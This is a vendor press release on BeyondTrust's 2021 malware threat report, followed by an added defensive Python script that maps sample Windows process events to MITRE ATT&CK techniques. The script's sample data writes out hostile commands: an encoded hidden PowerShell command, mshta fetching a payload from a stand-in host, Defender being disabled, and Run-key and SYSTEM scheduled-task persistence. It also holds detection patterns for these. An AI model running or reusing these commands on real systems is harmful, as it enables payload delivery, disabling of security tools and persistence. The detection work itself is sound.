BeyondTrust releases BeyondTrust Labs Malware Threat Report 2021

BeyondTrust, the worldwide leader in Privileged Access Management, announced the release of the BeyondTrust Labs Malware Threat Report 2021. The research provides insights into threats and privileged account misuse on Windows devices around the world. The report, based on real-world monitoring and analysis of attacks between Q1 2020 and Q1 2021, is produced by the BeyondTrust Labs team with collaboration from customers and incident response teams using BeyondTrust solutions. The report also dives into recurring threat themes and maps out tactics, techniques, and procedures against the MITRE ATT&CK® Enterprise Framework.

The BeyondTrust Malware Threat Report tested the 58 MITRE ATT&CK techniques listed for the Cobalt Strike threat emulation software, using Privilege Management for Windows, against 150 current malware strains.

Key report findings:

  • Absent the right protection, malware will disable endpoint security controls and undermine security investments.
  • The use of native tools to perform fileless attacks in the initial stages of attack is a growing trend, enabling attackers to gain a strong foothold by establishing a persistence mechanism with security controls disabled.
  • The MITRE ATT&CK Framework is effective in distilling a wide range of malware strains and cyberattacks into component techniques, which can then be mitigated.
  • BeyondTrust Privilege Management for Windows' out-of-the-box policies proactively disrupted all 150 different, common attack chains tested.
  • Removal of admin rights and implementation of pragmatic application control are two of the most effective security controls for preventing and mitigating the most common malware threats.

“For decades, enterprises have made significant investments in security solutions in an attempt to strengthen their cyber defenses,” said James Maude, Lead Cybersecurity Researcher at BeyondTrust. “Many of these investments have proven to be ineffective, particularly with changes brought on by the pandemic. Security perimeters have dissolved, creating an exponential growth in attack surfaces, and rendering network monitoring and firewall technologies less effective. Endpoint privilege management solutions enable enterprises to reduce their attack surfaces, while gaining greater control over their digital infrastructure.”

While ransomware has clearly evolved, the fundamental needs to execute code and leverage privileges have largely remained consistent. Whether it’s ransomware hitting a single endpoint or a sophisticated, tailored attack, proactively reducing the attack surface by removing admin accounts and controlling application execution is highly effective.

Threat actors work ceaselessly to evolve their operations and have matured significantly over the past year. Attackers are exploiting new exposures, using elevation of privilege attacks and sophisticated malware campaigns to take advantage of an enterprise’s often vulnerable front line of defense, its users.

Parallel to legitimate software companies trending towards SaaS, threat actors are shifting to Malware-as-a-Service (MaaS), with specialists emerging in different areas, including enterprise credential sales, initial access to a target organization, lateral movement capability, and payload delivery. Today, many different pieces of malware can come together in a single attack. A ransomware attack can involve multiple threat actors, tools and platforms. And, as threat actors seek to maximize the disruption to organizations and extract the highest ransom payments, the ransomware model is also shifting towards human-driven, enterprise-wide attacks.

There are thousands of malware variants appearing every day and a constant stream of zero-day threats and emergency patches. Defensive tactics that can be employed with BeyondTrust Privilege Management include:

  • Execution and Persistence – Control what code can execute through allow listing, limiting the attacker’s ability to run payloads or install a persistence mechanism.
  • Privilege Escalation – Without access to a local administrator or other privileged account, the attacker is limited in the systems and data they can access.
  • Defense Evasion – To evade detection, an attacker needs both the privileges and the ability to execute code to tamper with system settings and security tools.
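The report's two recurring observations, native tools used for fileless execution and persistence with security controls disabled, and the point that tampering with security tools needs admin rights, can be made concrete by triaging process-creation events against the ATT&CK tactics listed above. The following is an added example, not code from the report or from BeyondTrust: it parses a handful of constructed Windows process-creation log lines (the `time|user|elevated|image|command line` format, the user names, paths and URL are all assumptions), matches them against a small rule set keyed by public ATT&CK Enterprise technique IDs, and marks which matched steps would fail outright for a standard user with no admin rights.

```python
"""Added example (not from the BeyondTrust report): map constructed Windows
process-creation events to MITRE ATT&CK tactics and flag the steps that
removing admin rights would stop. Log format and sample data are assumptions."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    tactic: str          # ATT&CK Enterprise tactic
    technique: str       # ATT&CK Enterprise technique ID
    pattern: re.Pattern
    needs_admin: bool    # the action only succeeds when the process is elevated


RULES = [
    Rule("Encoded PowerShell command (fileless execution)", "Execution", "T1059.001",
         re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), False),
    Rule("Script proxy execution via mshta/regsvr32/rundll32", "Execution", "T1218",
         re.compile(r"\\(mshta|regsvr32|rundll32)\.exe\b.*(https?://|\.sct\b|javascript:)", re.I), False),
    Rule("HKCU Run key persistence (no admin needed)", "Persistence", "T1547.001",
         re.compile(r'\breg(\.exe)?\s+add\s+"?HKCU\\.*\\CurrentVersion\\Run\b', re.I), False),
    Rule("HKLM Run key persistence (admin needed)", "Persistence", "T1547.001",
         re.compile(r'\breg(\.exe)?\s+add\s+"?HKLM\\.*\\CurrentVersion\\Run\b', re.I), True),
    Rule("Defender real-time monitoring disabled", "Defense Evasion", "T1562.001",
         re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I), True),
    Rule("Scheduled task created to run as SYSTEM", "Privilege Escalation", "T1053.005",
         re.compile(r'\bschtasks(\.exe)?\s+/create\b.*/ru\s+"?(NT AUTHORITY\\)?SYSTEM\b', re.I), True),
]

# Constructed sample events: time|user|elevated|image|command line (not real telemetry).
SAMPLE_EVENTS = [
    r"2021-03-02T09:14:05|CORP\jdoe|no|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r"2021-03-02T09:14:09|CORP\jdoe|no|C:\Windows\System32\mshta.exe|mshta.exe http://payload.example.invalid/update.hta",
    r'2021-03-02T09:14:12|CORP\jdoe|no|C:\Windows\System32\reg.exe|reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\jdoe\AppData\Roaming\svc.exe"',
    r'2021-03-02T09:14:15|CORP\jdoe|no|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"',
    r'2021-03-02T09:20:41|CORP\jdoe|no|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\jdoe\Documents\notes.txt',
    r'2021-03-02T09:21:02|CORP\jdoe|no|C:\Windows\System32\reg.exe|reg.exe query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
    r'2021-03-02T10:02:33|CORP\adm-jdoe|yes|C:\Windows\System32\schtasks.exe|schtasks.exe /create /tn Updater /tr "C:\ProgramData\svc.exe" /sc onlogon /ru SYSTEM',
]


def parse_event(line: str) -> dict:
    """Split one constructed log line into its five fields."""
    time, user, elevated, image, cmdline = line.split("|", 4)
    return {"time": time, "user": user, "elevated": elevated.strip().lower() == "yes",
            "image": image, "cmdline": cmdline}


def triage(lines):
    """Return one finding per (event, matching rule), with the ATT&CK mapping."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        text = f"{ev['image']} {ev['cmdline']}"   # rules look at image path and command line together
        for rule in RULES:
            if rule.pattern.search(text):
                findings.append({
                    "time": ev["time"], "user": ev["user"],
                    "tactic": rule.tactic, "technique": rule.technique, "rule": rule.name,
                    # The report's point in code: a step that needs admin rights fails for a
                    # standard user even though the code itself ran.
                    "stopped_by_least_privilege": rule.needs_admin and not ev["elevated"],
                })
    return findings


def summarize(findings):
    """Count findings per tactic and how many removing admin rights would have stopped."""
    by_tactic = {}
    for f in findings:
        by_tactic[f["tactic"]] = by_tactic.get(f["tactic"], 0) + 1
    stopped = sum(1 for f in findings if f["stopped_by_least_privilege"])
    return {"by_tactic": by_tactic, "stopped_by_least_privilege": stopped}


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        flag = "  <- fails without admin rights" if f["stopped_by_least_privilege"] else ""
        print(f"{f['time']} {f['user']:<14} {f['tactic']:<20} {f['technique']:<10} {f['rule']}{flag}")
    print(summarize(triage(SAMPLE_EVENTS)))
```

On the sample data the four steps run by the standard user (encoded PowerShell, mshta download, HKCU Run key, Defender tampering) all match, but only the Defender tampering is marked as stopped by least privilege: fileless execution and user-level persistence do not need admin rights, which is why the report pairs removal of admin rights with application control rather than relying on either alone. Rules of this kind are a triage aid, not a replacement for endpoint telemetry; the patterns are deliberately narrow and will miss obfuscated variants.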